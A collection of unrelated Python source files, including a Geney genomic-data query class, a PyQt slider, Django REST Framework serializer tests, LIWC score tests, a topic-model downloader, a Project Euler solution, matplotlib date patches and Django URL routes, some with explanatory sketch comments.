self.filters is a dictionary mapping column names to lists containing either a dictionary or lists of values self.features is a list of additional columns to include in the output self.groups is a list with strings, where if any column starts with any of these values plus a double underscore, it should be included in the output self.geney_file_collection is a GeneyFileCollection object with all necessary files to perform filters """ # with open(geney_file_collection.json_file) as f: # data = json.load(f) data = json.loads(json_filter) self.filters = data["filters"] self.features = data["features"] self.groups = data["groups"] self.geney_file_collection = geney_file_collection @staticmethod def write_to_file(df, out_file_path, out_file_type=None, gzip_results=False, include_index=False, null='NA', index_col="Sample", transpose=False): output_file = SSFile.factory(out_file_path, out_file_type) output_file.write_to_file(df, gzipResults=gzip_results, includeIndex=include_index, null=null, indexCol=index_col, transpose=transpose) return out_file_path def filter_data(self, samples_only=False): indexes_sets = [] for single_filter in self.filters: if self.__determine_filter_type(self.filters[single_filter]) == "discrete": indexes_sets.append(self.__perform_discrete_filter(single_filter, self.filters[single_filter])) elif self.__determine_filter_type(self.filters[single_filter]) == "continuous": indexes_sets.append(self.__perform_continuous_filter(single_filter, self.filters[single_filter])) else: raise Exception("Error: JSON query is malformed") # Find intersection of all sets produced by filters result_row_indexes = set.intersection(*indexes_sets) result_row_indexes = sorted(list(result_row_indexes)) # Grab rows that match the indexes matching_samples = [] for index in result_row_indexes: matching_samples.append(self.geney_file_collection.samples[index]) if samples_only: return matching_samples # Determine which columns (specifically the indexes) to grab for all the matching samples desired_column_indexes = self.__determine_additional_columns() desired_column_indexes.insert(0, 0) output_rows = [] header_row = [self.geney_file_collection.features[i].decode('UTF-8') for i in desired_column_indexes] output_rows.append(header_row) del (desired_column_indexes[0]) # TODO: add an option for grabbing all items in the row, not just the desired columns? for sample in matching_samples: self.geney_file_collection.tsv_file.seek(self.geney_file_collection.tsv_map[sample][0]) entire_row = self.geney_file_collection.tsv_file.read(self.geney_file_collection.tsv_map[sample][1]).rstrip( b"\n").split(b"\t") reduced_row = [sample] + [entire_row[i - 1] for i in desired_column_indexes] reduced_row = (b"\t".join(reduced_row)).decode('UTF-8') reduced_row = reduced_row.split("\t") output_rows.append(reduced_row) df = self.__build_pandas_dataframe(output_rows) return df def __build_pandas_dataframe(self, output_rows): output = io.StringIO() csv_writer = csv.writer(output, delimiter='\t') for row in output_rows: csv_writer.writerow(row) output.seek(0) df = pd.read_csv(output, sep='\t') return df def __write_to_csv(self, output_rows): out = open("output.tsv", "w") for row in output_rows: out.write(row) def __determine_additional_columns(self): """ Finds the indexes of all columns whose data will be reported. 
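# --- Illustrative sketch of the offset-map lookup used by filter_data() ---
# GeneyQuery never loads the whole TSV: tsv_map maps a sample name to an
# (offset, length) pair, and filter_data() seek()s to that offset and read()s
# exactly that many bytes to get one row.  A minimal, in-memory version of the
# same access pattern (toy data, not the real Geney files):

import io

tsv_bytes = b"sampleA\t1\t2\t3\nsampleB\t4\t5\t6\n"
tsv_file = io.BytesIO(tsv_bytes)

# offset/length index such as the one unpacked from sample_data.msgpack
tsv_map = {
    b"sampleA": (0, 14),   # b"sampleA\t1\t2\t3\n"
    b"sampleB": (14, 14),  # b"sampleB\t4\t5\t6\n"
}

offset, length = tsv_map[b"sampleB"]
tsv_file.seek(offset)
row = tsv_file.read(length).rstrip(b"\n").split(b"\t")
print(row)  # [b'sampleB', b'4', b'5', b'6']
# --- end sketch ---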
This includes columns specified in the filters, the features, and the groups """ # Start with additional requested features column_indexes = [i for i in range(0, len(self.geney_file_collection.features)) if (self.geney_file_collection.features[i].decode("UTF-8") in self.features)] # Add features mentioned in the filters filter_columns = [key for key in self.filters] filter_column_indexes = [i for i in range(0, len(self.geney_file_collection.features)) if (self.geney_file_collection.features[i].decode("UTF-8") in filter_columns)] column_indexes += filter_column_indexes # Add features determined by groups column_indexes += self.__determine_group_columns() column_indexes = sorted(list(set(column_indexes))) return column_indexes def __determine_group_columns(self): """ Finds column names that start with whatever is listed under self.groups plus a double underscore. Returns the index of those columns """ columns_from_group = [] for group in self.groups: temp_columns = [feature for feature in self.geney_file_collection.features if (feature.decode("UTF-8").startswith(group + "__"))] columns_from_group += temp_columns # get indexes of the columns group_indexes = [i for i in range(0, len(self.geney_file_collection.features)) if (self.geney_file_collection.features[i] in columns_from_group)] return group_indexes def __determine_filter_type(self, single_filter): if isinstance(single_filter[0], dict): return "continuous" elif isinstance(single_filter[0], str) or isinstance(single_filter, bool): return "discrete" else: print(single_filter) raise Exception("Error: JSON filter is malformed") def __perform_discrete_filter(self, column_name, values_list): """ Performs a filter for discrete values :param column_name: string name of a column to be examined :param values_list: list of string values that are accepted in the column of 'column_name' :return: set with row indexes of rows that match filter criteria """ location_range = self.geney_file_collection.transposed_map[bytes(column_name, encoding='utf-8')] self.geney_file_collection.transposed_tsv_file.seek(location_range[0]) desired_feature_data = self.geney_file_collection.transposed_tsv_file.read(location_range[1]).split(b"\t") matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item].decode("UTF-8") in values_list)] return set(matching_samples) def __perform_continuous_filter(self, column_name, filter_info): """ Performs a filter for continuous values :param column_name: string name of a column to be examined :param filter_info: list with a dictionary with key "operator" whose value is a string representation of a mathematcial operator, and a key "value" with a numerical value :return: set with row indexes of rows that match filter criteria """ # TODO: find out how to fix the line below, converting column_name to b location_range = self.geney_file_collection.transposed_map[bytes(column_name, encoding='utf-8')] self.geney_file_collection.transposed_tsv_file.seek(location_range[0]) desired_feature_data = self.geney_file_collection.transposed_tsv_file.read(location_range[1]).split(b"\t") # matching_samples holds the indexes of samples that match the filters matching_samples = [] operator = filter_info[0]["operator"] value = filter_info[0]["value"] if operator == "<": matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) < value)] elif operator == "<=": matching_samples = [item for item in range(0, 
len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) <= value)] elif operator == ">": matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) > value)] elif operator == ">=": matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) >= value)] elif operator == "==": matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) == value)] elif operator == "!=": matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) != value)] else: raise Exception("Error: invalid operator in JSON filter: " + str(operator)) return set(matching_samples) class GeneyFileCollection: """ Stores all TSV and MessagePack file information needed allow for future filtering """ def __init__(self, tsv_file_path, messagepack_tsv_path, transposed_tsv_file_path, transposed_messagepack_tsv_path): messagepack_tsv = open(messagepack_tsv_path + "/sample_data.msgpack", "rb") self.tsv_map = msgpack.unpack(messagepack_tsv, max_map_len=10000000, max_array_len=10000000) sample_file = open(messagepack_tsv_path + "/samples.msgpack", "rb") self.samples = msgpack.unpack(sample_file, max_map_len=10000000, max_array_len=10000000) transposed_map_file = open(transposed_messagepack_tsv_path + "/sample_data.msgpack", "rb") self.transposed_map = msgpack.unpack(transposed_map_file, max_map_len=10000000, max_array_len=10000000) transposed_samples_file = open(transposed_messagepack_tsv_path + "/samples.msgpack", "rb") self.transposed_samples = msgpack.unpack(transposed_samples_file, max_map_len=10000000, max_array_len=10000000) self.tsv_file = open(tsv_file_path, "rb") self.transposed_tsv_file = open(transposed_tsv_file_path, "rb") features_file = open(messagepack_tsv_path + "/features.msgpack", "rb") self.features = msgpack.unpack(features_file, max_map_len=10000000, max_array_len=10000000) from PyQt5.QtWidgets import (QWidget, QSlider, QHBoxLayout, QLabel, QApplication) from PyQt5.QtCore import Qt from PyQt5.QtGui import QPixmap import sys class SliderImpl(QSlider): def __init__(self, callback): super().__init__() self.callback = callback def mouseReleaseEvent(self, event): super(QSlider, self).mouseReleaseEvent(event) self.callback() class Slider(QWidget): def __init__(self, parent, min, max, callback, release_callback): super().__init__() self.parent = parent self.callback = callback self.index = int((max - min ) / 2) hbox = QHBoxLayout() self.slider = SliderImpl(release_callback) self.slider.setOrientation(Qt.Horizontal) self.slider.setRange(min, max) self.slider.setValue(self.index) self.slider.setFocusPolicy(Qt.NoFocus) self.slider.setPageStep(1) self.slider.valueChanged.connect(self.onDataChanged) self.label = QLabel(str(min), self) self.label.setAlignment(Qt.AlignCenter | Qt.AlignVCenter) self.label.setMinimumWidth(80) self.label.setText(str(self.index)) hbox.addWidget(self.slider) hbox.addSpacing(15) hbox.addWidget(self.label) self.setLayout(hbox) def onDataChanged(self, value): self.index = value self.label.setText(str(value)) self.callback() def setRange(self, min, max): if min > self.slider.value(): self.index = min self.slider.setValue(self.index) self.callback() if max < self.slider.value(): self.index = max 
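# --- Illustrative sketch: table-driven version of the continuous filter ---
# __perform_continuous_filter above repeats the same comprehension once per
# comparison operator.  The standard-library ``operator`` module lets the six
# branches collapse into a single lookup; this is only a possible refactoring
# of the idea, shown on toy byte data rather than the memory-mapped TSV:

import operator

_OPS = {
    "<": operator.lt, "<=": operator.le,
    ">": operator.gt, ">=": operator.ge,
    "==": operator.eq, "!=": operator.ne,
}


def continuous_filter(feature_data, op_symbol, value):
    """Return indexes of non-NA entries satisfying ``entry <op> value``."""
    try:
        op = _OPS[op_symbol]
    except KeyError:
        raise Exception("Error: invalid operator in JSON filter: " + op_symbol)
    return {
        i for i, item in enumerate(feature_data)
        if item != b'NA' and op(float(item), value)
    }


print(continuous_filter([b'1.5', b'NA', b'3.0', b'0.2'], ">=", 1.0))  # {0, 2}
# --- end sketch ---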
self.slider.setValue(self.index) self.callback() self.slider.setValue(self.index) self.onDataChanged(self.index) self.slider.setRange(min, max) def getIndex(self): return self.index<reponame>caioalexleme/Curso_Python a = [2, 3, 4, 7] b = a # Cria uma sincronização da lista A com a lista B b[2] = 8 print(f'Lista A: {a}') print(f'Lista B: {b}') print('-' * 10) b = a [:] # Agora lista B cria ua cópia da lista A utilizando fatiamento b[2] = 6 print(f'Lista A: {a}') print(f'Lista B: {b}')""" Tests to cover bulk create and update using serializers. """ from __future__ import unicode_literals from django.test import TestCase from django.utils import six from rest_framework import serializers class BulkCreateSerializerTests(TestCase): """ Creating multiple instances using serializers. """ def setUp(self): class BookSerializer(serializers.Serializer): id = serializers.IntegerField() title = serializers.CharField(max_length=100) author = serializers.CharField(max_length=100) self.BookSerializer = BookSerializer def test_bulk_create_success(self): """ Correct bulk update serialization should return the input data. """ data = [ { 'id': 0, 'title': 'The electric kool-aid acid test', 'author': '<NAME>' }, { 'id': 1, 'title': 'If this is a man', 'author': '<NAME>' }, { 'id': 2, 'title': 'The wind-up bird chronicle', 'author': '<NAME>' } ] serializer = self.BookSerializer(data=data, many=True) assert serializer.is_valid() is True assert serializer.validated_data == data assert serializer.errors == [] def test_bulk_create_errors(self): """ Incorrect bulk create serialization should return errors. """ data = [ { 'id': 0, 'title': 'The electric kool-aid acid test', 'author': '<NAME>' }, { 'id': 1, 'title': 'If this is a man', 'author': '<NAME>' }, { 'id': 'foo', 'title': 'The wind-up bird chronicle', 'author': '<NAME>' } ] expected_errors = [ {}, {}, {'id': ['A valid integer is required.']} ] serializer = self.BookSerializer(data=data, many=True) assert serializer.is_valid() is False assert serializer.errors == expected_errors assert serializer.validated_data == [] def test_invalid_list_datatype(self): """ Data containing list of incorrect data type should return errors. """ data = ['foo', 'bar', 'baz'] serializer = self.BookSerializer(data=data, many=True) assert serializer.is_valid() is False text_type_string = six.text_type.__name__ message = 'Invalid data. Expected a dictionary, but got %s.' % text_type_string expected_errors = [ {'non_field_errors': [message]}, {'non_field_errors': [message]}, {'non_field_errors': [message]} ] assert serializer.errors == expected_errors def test_invalid_single_datatype(self): """ Data containing a single incorrect data type should return errors. """ data = 123 serializer = self.BookSerializer(data=data, many=True) assert serializer.is_valid() is False expected_errors = {'non_field_errors': ['Expected a list of items but got type "int".']} assert serializer.errors == expected_errors def test_invalid_single_object(self): """ Data containing only a single object, instead of a list of objects should return errors. """ data = { 'id': 0, 'title': 'The electric kool-aid acid test', 'author': '<NAME>' } serializer = self.BookSerializer(data=data, many=True) assert serializer.is_valid() is False expected_errors = {'non_field_errors': ['Expected a list of items but got type "dict".']} assert serializer.errors == expected_errors """ Test classes for the liwc module. 
""" import unittest import numpy as np from numpy.testing import assert_allclose from liwc_methods import LIWCScores class TestLIWCScores(unittest.TestCase): """ Tests for the LIWCScore class. """ def test_get_neuroticism(self): """ Test if the right calculation is done for getting neuroticism. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([0.18]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_neuroticism(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_extraversion(self): """ Test if the right calculation is done for getting extraversion. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([0.92]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_extraversion(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_openness(self): """ Test if the right calculation is done for getting openness. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([-2.55]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_openness(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_acceptance(self): """ Test if the right calculation is done for getting acceptance. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([1.08]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_agreeableness(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_conscientiousness(self): """ Test if the right calculation is done for getting conscientiousness. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([-0.54]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_conscientiousness(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_big_five_scores(self): """ Test if the right calculation is done for getting conscientiousness. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([[-2.55], [-0.54], [0.92], [1.08], [0.18]]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_big_five_scores(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_signficance_matrix_05(self): """ Tets if you properly get the 0.05 precision matrix if you enter 0.05 as signf. """ liwc = LIWCScores(signf=0.05, version=2001, author='yarkoni') expected = liwc.corr_05 result = liwc._get_significance_matrix() assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_signficance_matrix_01(self): """ Tets if you properly get the 0.01 precision matrix if you enter 0.01 as signf. """ liwc = LIWCScores(signf=0.01, version=2001, author='yarkoni') expected = liwc.corr_01 result = liwc._get_significance_matrix() assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_signficance_matrix_05_golbeck(self): """ Tets if you properly get the 0.05 precision matrix if you enter 0.05 as signf and author Golbeck. """ liwc = LIWCScores(signf=0.05, version=2007, author='golbeck') expected = liwc.corr_05_golbeck result = liwc._get_significance_matrix() assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_columns_2001(self): """ Tets if all columns are returned of the LIWC 2001 Yarkoni version. """ liwc = LIWCScores(signf=0.01, version=2001, author='yarkoni') expected = 66 result = liwc._get_columns(2001) self.assertEqual(expected, len(result)) def test_get_columns_2007(self): """ Tets if all columns are returned of the LIWC 2007 Golbeck version. 
""" liwc = LIWCScores(signf=0.01, version=2007, author='golbeck') expected = 61 result = liwc._get_columns(2007) self.assertEqual(expected, len(result)) <reponame>hhaoyan/ScientificTopics import json import os import sys import requests import yaml default_model_url = 'https://github.com/hhaoyan/ScientificTopics/' \ 'raw/master/data_20190830/default_model.yaml' default_model_name = 'data_20190830' def _data_dir(): data_dir = os.path.expanduser('~/.scientific_topics') if not os.path.exists(data_dir): os.mkdir(data_dir) return data_dir def _download_file(url, path): try: os.makedirs(os.path.dirname(path)) except FileExistsError: pass with requests.get(url, stream=True) as req: size = 0 req.raise_for_status() with open(path, 'wb') as f: for chunk in req.iter_content(chunk_size=8192): if chunk: f.write(chunk) size += len(chunk) return size def download_model(metadata_url=default_model_url): data_dir = _data_dir() print("Fetching metadata...") metadata_req = requests.get(metadata_url) metadata = yaml.safe_load(metadata_req.content) model_home = os.path.join(data_dir, metadata['model_name']) if os.path.exists(os.path.join(model_home, 'downloaded')): return try: os.mkdir(model_home) except FileExistsError: pass with open(os.path.join(model_home, 'meta.json'), 'w') as f: json.dump(metadata, f) for download in metadata['data_files']: print("Fetching file %s from %s..." % ( download['file_fn'], os.path.join(model_home, download['file_fn'])), end='') sys.stdout.flush() print("%d bytes" % _download_file( download['file_url'], os.path.join(model_home, download['file_fn']))) with open(os.path.join(model_home, 'downloaded'), 'w') as f: f.write('downloaded') def _get_default_model(model_name=default_model_name, topic_model=0): data_dir = _data_dir() model_home = os.path.join(data_dir, model_name) if not os.path.exists(os.path.join(model_home, 'downloaded')): raise FileNotFoundError('No model found at %s, did you use ' '"python -m ScientificTopics.download"?' 
% model_home) with open(os.path.join(model_home, 'meta.json')) as f: metadata = json.load(f) if isinstance(topic_model, int): topic_model = metadata['topic_models'][topic_model]['name'] try: topic_model = next(x for x in metadata['topic_models'] if x['name'] == topic_model) except StopIteration: raise NameError('No such topic model: ' + topic_model) punkt_file = os.path.join(model_home, metadata['punkt_data_fn']) spm_file = os.path.join(model_home, metadata['sentencepiece_data_fn']) stopwords = os.path.join(model_home, metadata['stopwords_data_fn']) lda_result_dir = os.path.join(model_home, topic_model['root']) return { 'punkt_model': punkt_file, 'spm_model': spm_file, 'stopwords': stopwords, 'lda_result_dir': lda_result_dir, 'alpha': topic_model['alpha'], 'beta': topic_model['beta'], 'num_vocab': metadata['vocab_size'], } if __name__ == '__main__': download_model() <filename>solutions/problem18.py # coding: utf8 # Author: <NAME> (~wy) # Date: 2017 # Triangle Sums triangle = """75 95 64 17 47 82 18 35 87 10 20 04 82 47 65 19 01 23 75 03 34 88 02 77 73 07 63 67 99 65 04 28 06 16 70 92 41 41 26 56 83 40 80 70 33 41 48 72 33 47 32 37 16 94 29 53 71 44 65 25 43 91 52 97 51 14 70 11 33 28 77 73 17 78 39 68 17 57 91 71 52 38 17 14 91 43 58 50 27 29 48 63 66 04 68 89 53 67 30 73 16 69 87 40 31 04 62 98 27 23 09 70 98 73 93 38 53 60 04 23""" triangle_lines = triangle.split("\n") triangle_arr = [] for line in triangle_lines: arr = line.split() for i in range(len(arr)): arr[i] = int(arr[i]) triangle_arr.append(arr) size = 14 memory = {} def tri_sumx(i,j): x = memory.get(str(i)+","+str(j)) if x is None: answer = tri_sum(i,j,0) memory[str(i)+","+str(j)]= answer return answer else: return memory.get(str(i)+","+str(j)) def tri_sum(i,j,summary): if i == 14: return summary + triangle_arr[i][j] a = tri_sumx(i+1,j) b = tri_sumx(i+1,j+1) return max(a,b)+triangle_arr[i][j] for i in range(14,-1,-1): for j in range(i,-1,-1): tri_sumx(i,j) <reponame>lizeyan/pyprof from pyprof import profile, clean, Profiler, report import time import numpy as np from .test_utils import close # noinspection PyProtectedMember def test_profile_proxy(): clean() from pyprof.pyprof import _root_profiler times = np.abs(np.random.normal(0.1, 0.01, 10)) with profile("p1"): time.sleep(0.5) for t in times: with profile("p2"): time.sleep(t) p1 = Profiler("p1") p2 = Profiler("p2", p1) assert _root_profiler._children == {p1} assert p1.count == 1 assert p2.count == len(times) assert close(p2.average, np.mean(times).item()) assert close(p1.total, 0.5 + sum(times)) print() print(report()) # noinspection PyProtectedMember def test_profile_proxy_decorator(): times = np.abs(np.random.normal(0.1, 0.01, 10)) @profile def f(_): time.sleep(_) @profile("p1") def g(): time.sleep(0.5) for t in times: f(t) clean() from pyprof.pyprof import _root_profiler g() p1 = Profiler("p1") p2 = Profiler("test_profile_proxy_decorator.<locals>.f", p1) assert _root_profiler._children == {p1} assert p1.count == 1 assert p2.count == len(times) assert close(p2.average, np.mean(times).item()) assert close(p1.total, 0.5 + sum(times)) print() print(report()) <filename>shed/cli.py import sys import click from . 
import __lang_extension__, __lang_name__, __version__ from .config import settings from .execute import execute from .transpiler import TranspilerContext, transpile from .utils import console, info, prettify, print_center, print_line, print_padded, title VERBOSITY_NUM_TO_STR = { 1: 'info', 2: 'develop', 3: 'debug', } def is_filename(script: str) -> bool: return script.endswith(__lang_extension__) @click.command(f'Run {__lang_name__} script') @click.argument('script', nargs=1, required=True) @click.option('-v', '--verbose', count=True) @click.option('-t', '--transpile', 'show_transpiled', is_flag=True, default=False) @click.option('-r', '--run', 'run_anyway', is_flag=True, default=False) def main( # pylint:disable=R0915 script: str, show_transpiled: bool, run_anyway: bool, verbose: int ) -> None: script = script.strip() context = TranspilerContext(verbosity=verbose,) if verbose: console.print(f'Verbosity: {info(f"{VERBOSITY_NUM_TO_STR[verbose]} ({verbose})")}') console.print(f'Processing: {info(script)}') console.print() if verbose >= 2: console.print(title(f'{__lang_name__.upper()} info')) print_padded(f'Version {info(__version__)}', 1) for name, value in settings: print_padded(f'{name}: {info(value)}', 1) console.print() if is_filename(script): context.set_filename(script) with open(script, 'r') as script_file: result_script_ast = transpile(file=script_file, context=context) else: result_script_ast = transpile(source=script, context=context) # pylint: disable=no-member if context.verbosity >= 2: # type:ignore print_line() print_center(title('Retokenized')) console.print(context.retokenized, highlight=False) if show_transpiled: print_line() print_center(title('Transpiled')) console.print(prettify(result_script_ast), highlight=False) if not run_anyway: sys.exit(0) if show_transpiled or verbose: print_line() print_center(title('Execution')) execute(result_script_ast, context) sys.exit(0) if __name__ == '__main__': # pylint: disable=E1120 main() <filename>git_pw/config.py<gh_stars>0 """ Configuration loader using 'git-config'. """ import logging from git_pw import utils LOG = logging.getLogger(__name__) class Config(object): def __init__(self): self._git_config = {} def __getattribute__(self, name): # attempt to use any attributes first try: value = super(Config, self).__getattribute__(name) except AttributeError: value = None if value: LOG.debug("Retrieved '{}' setting from cache".format(name)) return value # fallback to reading from git config otherwise value = utils.git_config('pw.{}'.format(name)) if value: LOG.debug("Retrieved '{}' setting from git-config".format(name)) setattr(self, name, value) return value CONF = Config() import numpy as np import datetime def get_patched_date2num(mpl): """Returns a patched version of `matplotlib.dates.date2num`""" def date2num(d): """ Convert datetime objects to Matplotlib dates. Parameters ---------- d : `datetime.datetime` or `numpy.datetime64` or sequences of these Returns ------- float or sequence of floats Number of days since the epoch. See `.get_epoch` for the epoch, which can be changed by :rc:`date.epoch` or `.set_epoch`. If the epoch is "1970-01-01T00:00:00" (default) then noon Jan 1 1970 ("1970-01-01T12:00:00") returns 0.5. Notes ----- The Gregorian calendar is assumed; this is not universal practice. For details see the module docstring. """ # this code is copied from matplotlib with the only modification # being the added block of code that converts pandas nat if hasattr(d, "values"): # this unpacks pandas series or dataframes... 
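# --- Illustrative sketch of the lazy-caching Config pattern above ---
# git_pw's Config.__getattribute__ first tries the attribute already stored on
# the instance and only falls back to ``git config pw.<name>`` on a miss,
# caching the answer with setattr() so git is consulted at most once per key.
# The same structure with a plain dict standing in for git-config (the dict
# and its values are made up for the demo):

_FAKE_GIT_CONFIG = {"pw.server": "https://patchwork.example.org", "pw.project": "demo"}


class CachedConfig(object):
    def __getattribute__(self, name):
        try:
            value = super(CachedConfig, self).__getattribute__(name)
        except AttributeError:
            value = None
        if value:
            return value                   # served from the instance cache
        value = _FAKE_GIT_CONFIG.get("pw.{}".format(name))
        if value:
            setattr(self, name, value)     # cache for the next lookup
        return value


conf = CachedConfig()
print(conf.server)   # looked up in the fake store, then cached
print(conf.server)   # second access comes straight from the cache
print(conf.missing)  # None: not cached, not in the store
# --- end sketch ---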
d = d.values # make an iterable, but save state to unpack later: iterable = np.iterable(d) if not iterable: d = [d] d = np.asarray(d) if not d.size: # deals with an empty array... return d.astype('float64') if hasattr(d.take(0), 'value'): # elements are pandas objects; temporarily convert data to numbers # pandas nat is defined as the minimum value of int64, # replace all 'min int' values with the string 'nat' and convert # the array to the dtype of the first non-nat value values = np.asarray([x.value for x in d], dtype='object') nat_mask = (np.iinfo('int64').min == values) if not all(nat_mask): _dtype = d[~nat_mask].take(0).to_numpy().dtype else: _dtype = 'timedelta64[us]' # default in case of all NaT d = np.where(nat_mask, 'nat', values).astype(_dtype) # convert to datetime64 arrays, if not already: if not np.issubdtype(d.dtype, np.datetime64): # datetime arrays if not d.size: # deals with an empty array... return d tzi = getattr(d[0], 'tzinfo', None) if tzi is not None: # make datetime naive: d = [dt.astimezone(mpl.dates.UTC).replace(tzinfo=None) for dt in d] d = np.asarray(d) d = d.astype('datetime64[us]') d = mpl.dates._dt64_to_ordinalf(d) return d if iterable else d[0] return date2num def get_patched_is_natively_supported(mpl): """Returns a patched version of `matplotlib.units._is_natively_supported`""" mpl_native = mpl.units._is_natively_supported def is_natively_supported(x, *args, **kwargs): # returns false if x is a timedelta # calls matplotlib's native function for all other dtypes patch_types = (datetime.timedelta, np.timedelta64) if isinstance(x, patch_types): return False if np.iterable(x): if (isinstance(x, np.ndarray) and np.issubdtype(x.dtype, 'timedelta64')): return False try: if hasattr(x[0], 'value'): # pandas nat is defined as the minimum value of int64, # remove all values which are equal to min int values = np.asarray([elem.value for elem in x], dtype='object') mask = (np.iinfo('int64').min == values) x = x[~mask] except IndexError: pass return mpl_native(x, *args, **kwargs) return is_natively_supported def get_patched_registry(mpl): mpl_native = mpl.units.Registry.get_converter def get_converter(self, x): try: if np.iterable(x) and hasattr(x[0], 'value'): # pandas nat is defined as the minimum value of int64, # remove all values which are equal to min int values = np.asarray([elem.value for elem in x], dtype='object') mask = (np.iinfo('int64').min == values) x = x[~mask] except IndexError: pass return mpl_native(self, x) return get_converter <filename>usa_greencard/pages_app/urls.py<gh_stars>0 from django.urls import path from .views import DvProgramView from django.views.generic import TemplateView app_name = "pages_app" urlpatterns = [ path("home/", TemplateView.as_view(template_name="pages_app/home.html"), name="home"), path("dv-program/", TemplateView.as_view(template_name="pages_app/dv_program.html"), name="dv-program"), path("contact/", TemplateView.as_view(template_name="pages_app/contact.html"), name="contact"), path("about/", TemplateView.as_view(template_name="pages_app/about.html"), name="about"), path("how-to-reg/", TemplateView.as_view(template_name="pages_app/how_to_reg.html"), name="how_to_reg"), path("requirements/", TemplateView.as_view(template_name="pages_app/requirements.html"), name="requirements"), path("green-card-process/", TemplateView.as_view(template_name="pages_app/green_card_process.html"), name="green_card_process"), path("advantages/", TemplateView.as_view(template_name="pages_app/advantages.html"), name="advantages"), 
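# --- Illustrative sketch of the NaT-sentinel masking used in the patches above ---
# The patched helpers rely on pandas encoding NaT as the minimum int64 value:
# building an object array of each element's ``.value`` and comparing it to
# ``np.iinfo('int64').min`` yields a mask of the missing timestamps, which can
# then be replaced or dropped before the data reaches matplotlib.  A minimal
# standalone demonstration of that mask:

import numpy as np
import pandas as pd

stamps = [pd.Timestamp("2021-01-01"), pd.NaT, pd.Timestamp("2021-01-02")]
values = np.asarray([x.value for x in stamps], dtype="object")

nat_mask = (np.iinfo("int64").min == values)
print(nat_mask)           # [False  True False]
print(values[~nat_mask])  # the two real timestamps as nanosecond integers
# --- end sketch ---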
path("private-entity/", TemplateView.as_view(template_name="pages_app/private_entity.html"), name="private_entity"), path("testimonials/", TemplateView.as_view(template_name="pages_app/testimonials.html"), name="testimonials"), path("terms-conditions/", TemplateView.as_view(template_name="pages_app/terms_conds.html"), name="terms_conds"), path("privacy-policy/", TemplateView.as_view(template_name="pages_app/privacy_policy.html"), name="privacy_policy"), path("eligible-countries/", TemplateView.as_view(template_name="pages_app/eligible_countries.html"), name="eligible_countries"), path("register/", TemplateView.as_view(template_name="pages_app/register.html"), name="register"), ] import json import argparse import numpy as np _CLASS_NAME = { "THUMOS":['BaseballPitch', 'BasketballDunk', 'Billiards', 'CleanAndJerk', 'CliffDiving', 'CricketBowling', 'CricketShot', 'Diving', 'FrisbeeCatch', 'GolfSwing', 'HammerThrow', 'HighJump', 'JavelinThrow', 'LongJump', 'PoleVault', 'Shotput', 'SoccerPenalty', 'TennisSwing', 'ThrowDiscus', 'VolleyballSpiking'], "ActivityNet":['Applying sunscreen', 'Archery', 'Arm wrestling', 'Assembling bicycle', 'BMX', 'Baking cookies', 'Ballet', 'Bathing dog', 'Baton twirling', 'Beach soccer', 'Beer pong', 'Belly dance', 'Blow-drying hair', 'Blowing leaves', 'Braiding hair', 'Breakdancing', 'Brushing hair', 'Brushing teeth', 'Building sandcastles', 'Bullfighting', 'Bungee jumping', 'Calf roping', 'Camel ride', 'Canoeing', 'Capoeira', 'Carving jack-o-lanterns', 'Changing car wheel', 'Cheerleading', 'Chopping wood', 'Clean and jerk', 'Cleaning shoes', 'Cleaning sink', 'Cleaning windows', 'Clipping cat claws', 'Cricket', 'Croquet', 'Cumbia', 'Curling', 'Cutting the grass', 'Decorating the Christmas tree', 'Disc dog', 'Discus throw', 'Dodgeball', 'Doing a powerbomb', 'Doing crunches', 'Doing fencing', 'Doing karate', 'Doing kickboxing', 'Doing motocross', 'Doing nails', 'Doing step aerobics', 'Drinking beer', 'Drinking coffee', 'Drum corps', 'Elliptical trainer', 'Fixing bicycle', 'Fixing the roof', 'Fun sliding down', 'Futsal', 'Gargling mouthwash', 'Getting a haircut', 'Getting a piercing', 'Getting a tattoo', 'Grooming dog', 'Grooming horse', 'Hammer throw', 'Hand car wash', 'Hand washing clothes', 'Hanging wallpaper', 'Having an ice cream', 'High jump', 'Hitting a pinata', 'Hopscotch', 'Horseback riding', 'Hula hoop', 'Hurling', 'Ice fishing', 'Installing carpet', 'Ironing clothes', 'Javelin throw', 'Kayaking', 'Kite flying', 'Kneeling', 'Knitting', 'Laying tile', 'Layup drill in basketball', 'Long jump', 'Longboarding', 'Making a cake', 'Making a lemonade', 'Making a sandwich', 'Making an omelette', 'Mixing drinks', 'Mooping floor', 'Mowing the lawn', 'Paintball', 'Painting', 'Painting fence', 'Painting furniture', 'Peeling potatoes', 'Ping-pong', 'Plastering', 'Plataform diving', 'Playing accordion', 'Playing badminton', 'Playing bagpipes', 'Playing beach volleyball', 'Playing 